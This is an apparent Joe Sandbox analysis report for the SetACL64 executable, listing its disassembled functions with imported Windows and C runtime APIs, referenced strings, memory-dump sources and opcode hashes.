API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name$boost::too_few_args: format-string referred to more arguments than were passed
API String ID: 2967684691-1915342359
Opcode ID: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
Instruction ID: 21724dfc0a28bbfb18c7b00882697253da9246477e7107943dec10fb919d1867
Opcode Fuzzy Hash: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
Instruction Fuzzy Hash: 6B514AA6B09B818AFB24DBB4D4402AC33B4FF94784F049175DE4DB7A56DF38A466D304

Function 00007FF697067576 Relevance: 10.6, APIs: 7, Instructions: 119COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697068006

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
Instruction ID: 9868550ca152e49ed0041226d9e286903f6209e9fb3f5521562a65f7960ec58b
Opcode Fuzzy Hash: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
Instruction Fuzzy Hash: 6C4191E2B1574285EF249B28D8A97AC2222EF847E8F505671EB6CC66D9DF7CD1C0C204

Function 00007FF6970782D8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF69707835D
GetLastError.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF69707836B
LoadLibraryExW.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF697078395
FreeLibrary.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF6970783DB
GetProcAddress.KERNEL32(?,?,?,00007FF69707858A,?,?,?,00007FF697078284,?,?,?,?,00007FF697075001), ref: 00007FF6970783E7

Strings

api-ms-, xrefs: 00007FF69707837D

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
Instruction ID: ba9cfb3d14f740f1f45ca328e8ef10ad8f6cf4870d955b81df20121e41dc5840
Opcode Fuzzy Hash: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
Instruction Fuzzy Hash: 8931D0A2B1AA4285FE319B1AAC4157A2394FF48BE0F5905B5DE1DCB3C5EF7CE4458304

Function 00007FF697092DD4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF697092E05
GetLastError.KERNEL32 ref: 00007FF697092E11
CloseHandle.KERNEL32 ref: 00007FF697092E29
CreateFileW.KERNEL32 ref: 00007FF697092E54
WriteConsoleW.KERNEL32 ref: 00007FF697092E73

Strings

CONOUT$, xrefs: 00007FF697092E35

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
Instruction ID: 61e5315dddb4ead7165a0c73c5a6c470d9e90c1dfcb5bcec1df4d173c1fb8068
Opcode Fuzzy Hash: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
Instruction Fuzzy Hash: DE11B271B18A4182E7608B12E894729B7A4FB98FF4F040274EA6EC77A4DF7CE5448744

Function 00007FF697063B20 Relevance: 9.2, APIs: 6, Instructions: 168COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF69705F5AD), ref: 00007FF697063B8B
GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF69705F5AD), ref: 00007FF697063BAF

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Information
String ID:
API String ID: 2951059284-0
Opcode ID: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
Instruction ID: 56437eae4e400c48d05d50a1800ff1bf3904f480a2903f9be19910b93614add8
Opcode Fuzzy Hash: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
Instruction Fuzzy Hash: 446193A2A0864A85EB708B11E86477AB7E0EF95BD4F044171EE8EC7694DE3CE681C740

Function 00007FF6970490D0 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6970490E6
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704910B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF697049135

Part of subcall function 00007FF697048F40: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697048FAE
Part of subcall function 00007FF697048F40: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF697048FF6
Part of subcall function 00007FF697048F40: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704909D

std::_Facet_Register.LIBCPMT ref: 00007FF6970491A4
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6970491BE
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6970491D3

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
String ID:
API String ID: 3702003507-0
Opcode ID: 626367f9b8e3e811170a77d3899fc771f4540901281f47c30c090418adc7da96
Instruction ID: 246ec2f184b3b98a3fde5f80561e396c497ee4c4294bc07a2bb77316b438699e
Opcode Fuzzy Hash: 626367f9b8e3e811170a77d3899fc771f4540901281f47c30c090418adc7da96
Instruction Fuzzy Hash: C041B3A1A18A4185EF259B56E8041BD6371FBA5BE4F0802B1DA5DC77E5EF3CE452C300

Function 00007FF697048830 Relevance: 9.1, APIs: 6, Instructions: 80COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697048846
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704886B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF697048895

Part of subcall function 00007FF6970486B0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697048719
Part of subcall function 00007FF6970486B0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF697048764
Part of subcall function 00007FF6970486B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6970487F4

std::_Facet_Register.LIBCPMT ref: 00007FF697048904
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704891E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF697048933

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
String ID:
API String ID: 3702003507-0
Opcode ID: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
Instruction ID: 08a15b1844611b2da730d9980c764ec859e3a960bd45acf01df8f7a662967a2b
Opcode Fuzzy Hash: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
Instruction Fuzzy Hash: 1C3172A1A0CA4281FF25DB15E8411B96360EF94BD4F1C06B5DA4DC77D5EE2CE851D304

Function 00007FF69704B340 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF69704B638
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF69704B675

Part of subcall function 00007FF697072864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF69704ABCE,?,?,00000000,00007FF6970310A5), ref: 00007FF697072874

Strings

D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF69704B42F
bad exception, xrefs: 00007FF69704B390
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FF69704B424

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: __std_exception_destroy$CriticalEnterSection
String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
API String ID: 2585855615-497953542
Opcode ID: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
Instruction ID: 915ec3f83331f336c24b995561ee27c12e739d9b6d853e9b1bf2520c43453b7b
Opcode Fuzzy Hash: 5cb6a45f1239e3b2c4532f3151a5061be94b55bfe2cba1f0f6b6aad54e40ba79
Instruction Fuzzy Hash: 96B16AB2B05B459AEB20CF64E8402AC73B5FB58B98B048176CE4DD3B68EF38E555C340

Function 00007FF69704AFC0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF69704B2B8
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF69704B2F5

Part of subcall function 00007FF697072864: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF69704ABCE,?,?,00000000,00007FF6970310A5), ref: 00007FF697072874

Strings

D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp, xrefs: 00007FF69704B0AF
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00007FF69704B0A4
bad allocation, xrefs: 00007FF69704B010

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: __std_exception_destroy$CriticalEnterSection
String ID: D:\Code\uberAgent\Libraries\boost\boost\exception\detail\exception_ptr.hpp$bad allocation$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
API String ID: 2585855615-1037022726
Opcode ID: 5e9cbe34132cbb56183852d500463e094e47345ad778f8edf29a13b90190a2c1
Instruction ID: 846b00b19fdbe9eb976d4c2a8932627f2a07b6fff59665242e09c0aecca23778
Opcode Fuzzy Hash: 5e9cbe34132cbb56183852d500463e094e47345ad778f8edf29a13b90190a2c1
Instruction Fuzzy Hash: D1B16BB2B05B419AEB20CF64E8401AC73B5FB58B98B448676CE4DD3B68EF38E555C340

Function 00007FF6970311A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00007FF6970311A6
GetLastError.KERNEL32 ref: 00007FF6970311B8
TlsAlloc.KERNEL32 ref: 00007FF697031206
GetLastError.KERNEL32 ref: 00007FF697031218

Strings

tss, xrefs: 00007FF6970311EE, 00007FF69703124E

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: AllocErrorLast
String ID: tss
API String ID: 4252645092-1638339373
Opcode ID: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
Instruction ID: 1d97d5e15c7d1ca688aaaee1f38a74e02d1c84a2129ed515eb667478f0d7dc12
Opcode Fuzzy Hash: 29b1765d9a66d25320b0dddf9ab890fdc794b5e67b2e205c5b857635990049a4
Instruction Fuzzy Hash: 26216FF5E09A4282E6309B24E88507963B0FF683E4F5006B1DA9DC27E5EF3CE5548700

Function 00007FF6970830FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF697083118
GetProcAddress.KERNEL32 ref: 00007FF69708312E
FreeLibrary.KERNEL32 ref: 00007FF69708314B

Strings

mscoree.dll, xrefs: 00007FF69708310F
CorExitProcess, xrefs: 00007FF697083127

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 731fd435a3bb48197be4118f7954fb208c5f98b7c3500d785dc345691a66c0b5
Instruction ID: fd2bd2b275132ed20262fbfb725f94f65fe90fc47599d4fd67f2c7e80f4ed899
Opcode Fuzzy Hash: 731fd435a3bb48197be4118f7954fb208c5f98b7c3500d785dc345691a66c0b5
Instruction Fuzzy Hash: 3BF05EE1B19A4281FF689F60E8843B96361EF94FE0F0414B5D80FC6660DE6CE488C300

Function 00007FF6970753F0 Relevance: 7.8, APIs: 5, Instructions: 290COMMONLIBRARYCODE

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF697075513
__AdjustPointer.LIBCMT ref: 00007FF69707555E

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
Instruction ID: cdab1569186101b94f80b16d138bb652419dec6ddee612be1f45f98e67ebede9
Opcode Fuzzy Hash: 9cd00bc65b5929a6a166b842d15e1553bccd8dfd8d4598a16b21d71fb64958ac
Instruction Fuzzy Hash: 05B1A0E2E0AB8282FE75DB1198906B867A1EF44BC4F5984B5EE4DCB795DE3CE451C300

Function 00007FF69708E93C Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69708E97D
GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF69708E8FB,?,?,?,00007FF697088743), ref: 00007FF69708EA3C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF69708E8FB,?,?,?,00007FF697088743), ref: 00007FF69708EABC

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: d45fe1b8cdaaec9b8e6fa35954052590595965d4a81a8b9fc00c55fb06775732
Instruction ID: d84afd8e1de90ad143fe6d317f0044efedc798440af79433e18440749cee1d8f
Opcode Fuzzy Hash: d45fe1b8cdaaec9b8e6fa35954052590595965d4a81a8b9fc00c55fb06775732
Instruction Fuzzy Hash: 3781CEB2F1865285FB709B6588802FD2AA0FF54FD8F5442B6DE0ED7B95DE3AA441C310

Function 00007FF69706CB62 Relevance: 7.7, APIs: 5, Instructions: 181COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF697085174: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69708519A

NetDfsGetClientInfo.NETAPI32 ref: 00007FF69706CCBD
NetApiBufferFree.NETAPI32 ref: 00007FF69706CD21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706CDE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706CDE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69706CDEC

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$BufferClientFreeInfo_invalid_parameter_noinfo
String ID:
API String ID: 1720291354-0
Opcode ID: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
Instruction ID: 61ebf1c97546f047ec957c187f29c619611e0a261b60d7aa5917134c80b1b819
Opcode Fuzzy Hash: 75da794e4bc783c4a2d79550abe500da8be22825966d2fcdd0e41012ba63a114
Instruction Fuzzy Hash: 1261D1A2B18A8281EA249B29D4543AE3761FB85FE4F405271DB5DC7AD9DF7DE580C300

Function 00007FF69708A08C Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF69708A0C8
_set_statfp.LIBCMT ref: 00007FF69708A0E6
_set_statfp.LIBCMT ref: 00007FF69708A10F
_set_statfp.LIBCMT ref: 00007FF69708A2C8

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bd59eed8a6f0dd15b1754f9599e9c4058d21ae63c9d51c95e5ebd76b830cc49a
Instruction ID: c3ec20f924dd5efbfb06116acec1f769187425a704d017780797d73e44e94e63
Opcode Fuzzy Hash: bd59eed8a6f0dd15b1754f9599e9c4058d21ae63c9d51c95e5ebd76b830cc49a
Instruction Fuzzy Hash: C751D6E3D0CD4685F6769B38D8123B6A260FF507E4F1482B5E95EE6ED4DF3EA4818600

Function 00007FF697090C1C Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF697090C44
_set_statfp.LIBCMT ref: 00007FF697090C5F
_set_statfp.LIBCMT ref: 00007FF697090C7B
_set_statfp.LIBCMT ref: 00007FF697090CB7

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
Instruction ID: 132274d72899aa202f7a3de8309c8462e6f0d9de254b20432d1c8b8f25999a1c
Opcode Fuzzy Hash: a0e95ead0251a3d4b91f5b95471b4db42acbeaa8104238e2645d395e8be0b7d9
Instruction Fuzzy Hash: 401191F2E1CA0715F7741328D9523B51541FF643F0E0946B4EAAECA7DACE2CA8614105

Function 00007FF697075FE8 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF697076186

Strings

csm, xrefs: 00007FF6970761AD
csm, xrefs: 00007FF6970760CD
csm, xrefs: 00007FF69707612F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

